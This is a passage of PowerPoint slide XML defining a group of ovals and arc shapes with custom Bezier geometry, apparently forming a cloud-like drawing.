                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F202DFE-6E03-A14B-8E1C-AC3CBADCA21B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="2004"/>
                <a:ext cx="92" cy="56"/>
                <a:chOff x="820" y="2004"/>
                <a:chExt cx="92" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66889" name="Oval 1353">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C7E565-5664-4D4C-B995-193C65D46101}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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0" name="Oval 1354">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448E06EC-44E5-5A4F-B882-9A327B505923}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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1" name="Oval 1355">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E22F7B-D934-F747-A2FB-39922830C028}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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2" name="Oval 1356">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4AC277-507E-5B42-820B-AD1387DDB99C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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3" name="Oval 1357">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E8BDCE-98E1-1F4C-AC37-CB60174E03E5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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4" name="Oval 1358">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C83F39C-EB76-694D-AD58-72ED459EDB1D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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5" name="Oval 1359">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA0C195-20CE-204E-B4BC-6F393717997B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1360">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113E7144-28F0-C34F-B2C2-B314AFE3B732}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1361">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50AFF87-817A-D542-B055-2F0D41A41B0D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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898" name="Group 1362">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D96A479-750B-534A-B631-7DCD75C48D83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="2004"/>
                <a:ext cx="92" cy="56"/>
                <a:chOff x="820" y="2004"/>
                <a:chExt cx="92" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66899" name="Arc 1363">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78EA5F23-E5BB-A04F-BE7A-9D991C5607BA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="853" y="2004"/>
                  <a:ext cx="38" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20812 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41217"/>
                    <a:gd name="T1" fmla="*/ 15819 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41217 w 41217"/>
                    <a:gd name="T3" fmla="*/ 14515 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20812 w 41217"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41217" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15818"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2596" y="6470"/>
                        <a:pt x="11109" y="0"/>
                        <a:pt x="20812" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30010" y="0"/>
                        <a:pt x="38199" y="5825"/>
                        <a:pt x="41216" y="14515"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41217" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15818"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2596" y="6470"/>
                        <a:pt x="11109" y="0"/>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0" name="Arc 1364">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7B80A8-ABFC-874E-908D-F28BCA8E88C6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="854" y="2005"/>
                  <a:ext cx="36" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20757 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41081"/>
                    <a:gd name="T1" fmla="*/ 15624 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41081 w 41081"/>
                    <a:gd name="T3" fmla="*/ 14286 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20757 w 41081"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41081" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15624"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2663" y="6372"/>
                        <a:pt x="11129" y="0"/>
                        <a:pt x="20757" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29866" y="0"/>
                        <a:pt x="37996" y="5714"/>
                        <a:pt x="41081" y="14285"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41081" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15624"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2663" y="6372"/>
                        <a:pt x="11129" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66901" name="Arc 1365">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8BB4FB-3D0E-5242-881F-9553491ABD56}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="830" y="2010"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 419 w 33372"/>
                    <a:gd name="T1" fmla="*/ 25836 h 25836"/>
                    <a:gd name="T2" fmla="*/ 33372 w 33372"/>
                    <a:gd name="T3" fmla="*/ 3490 h 25836"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33372"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25836"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33372" h="25836" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="419" y="25835"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="24441"/>
                        <a:pt x="0" y="23022"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25779" y="0"/>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2" name="Arc 1366">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{713563F8-7766-6346-A66E-CCAB5835A6E8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="831" y="2011"/>
                  <a:ext cx="22" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 434 w 33223"/>
                    <a:gd name="T1" fmla="*/ 25910 h 25910"/>
                    <a:gd name="T2" fmla="*/ 33223 w 33223"/>
                    <a:gd name="T3" fmla="*/ 3394 h 25910"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33223"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25910"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33223" h="25910" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="434" y="25909"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="24491"/>
                        <a:pt x="0" y="23047"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25718" y="0"/>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903" name="Arc 1367">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8A510A-4CE7-F340-804E-9A6EBE6B56A1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="826"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4" name="Arc 1368">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC79DEB4-7B30-E84B-856D-86E648884B82}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="827"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905" name="Arc 1369">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE2B69F-5AE3-E247-90E6-9746E5337C7E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2010"/>
                  <a:ext cx="18" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4526 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 26126"/>
                    <a:gd name="T1" fmla="*/ 479 h 32795"/>
                    <a:gd name="T2" fmla="*/ 22998 w 26126"/>
                    <a:gd name="T3" fmla="*/ 32795 h 32795"/>
                    <a:gd name="T4" fmla="*/ 4526 w 26126"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32795"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="26126" h="32795" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="479"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1487" y="160"/>
                        <a:pt x="3004" y="0"/>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0"/>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6" name="Arc 1370">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17FFC60-0093-2848-B5AE-755976997FA8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2011"/>
                  <a:ext cx="17" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4319 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25919"/>
                    <a:gd name="T1" fmla="*/ 436 h 33197"/>
                    <a:gd name="T2" fmla="*/ 22542 w 25919"/>
                    <a:gd name="T3" fmla="*/ 33197 h 33197"/>
                    <a:gd name="T4" fmla="*/ 4319 w 25919"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33197"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25919" h="33197" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="436"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1421" y="146"/>
                        <a:pt x="2868" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66907" name="Arc 1371">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D977E38-62F3-4D45-B92E-63B082DE50DE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="896" y="2024"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 16594 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13828 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 28809"/>
                    <a:gd name="T2" fmla="*/ 17814 w 21600"/>
                    <a:gd name="T3" fmla="*/ 28809 h 28809"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 16594 h 28809"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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8" name="Arc 1372">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4970D432-E733-1F4D-AADA-3D05C3A4FCC3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="896" y="2025"/>
                  <a:ext cx="15" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 16867 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13493 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 29422"/>
                    <a:gd name="T2" fmla="*/ 17577 w 21600"/>
                    <a:gd name="T3" fmla="*/ 29422 h 29422"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 16867 h 29422"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66909" name="Arc 1373">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92CA0B2-C1EE-9C47-8F6F-818B67ED31CD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2037"/>
                  <a:ext cx="20" cy="19"/>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0" name="Arc 1374">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67A5118-BDDF-5E4F-8690-C3672EA2DC17}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="891" y="2037"/>
                  <a:ext cx="18" cy="18"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66911" name="Arc 1375">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F4E82BB-A83C-9445-8650-FB53E41F9655}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="820" y="2024"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21528 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13091 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41382 h 41382"/>
                    <a:gd name="T2" fmla="*/ 19839 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41382"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21528 h 41382"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41382" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="37977"/>
                        <a:pt x="0" y="30168"/>
                        <a:pt x="0" y="21528"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10281"/>
                        <a:pt x="8629" y="916"/>
                        <a:pt x="19838" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41382" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="37977"/>
                        <a:pt x="0" y="30168"/>
                        <a:pt x="0" y="21528"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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2" name="Arc 1376">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376E2B44-527D-2C40-ABB6-B4AF0CAAD9CC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="821" y="2025"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21530 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13180 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41421 h 41421"/>
                    <a:gd name="T2" fmla="*/ 19860 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41421"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21530 h 41421"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41421" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41421"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38039"/>
                        <a:pt x="0" y="30205"/>
                        <a:pt x="0" y="21530"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10275"/>
                        <a:pt x="8641" y="906"/>
                        <a:pt x="19860" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41421" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41421"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38039"/>
                        <a:pt x="0" y="30205"/>
                        <a:pt x="0" y="21530"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66913" name="Arc 1377">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8806FC58-2F0F-1746-944E-3D11844D8E3E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="849" y="2048"/>
                  <a:ext cx="42" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21006 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 39208 w 39208"/>
                    <a:gd name="T1" fmla="*/ 11629 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 39208"/>
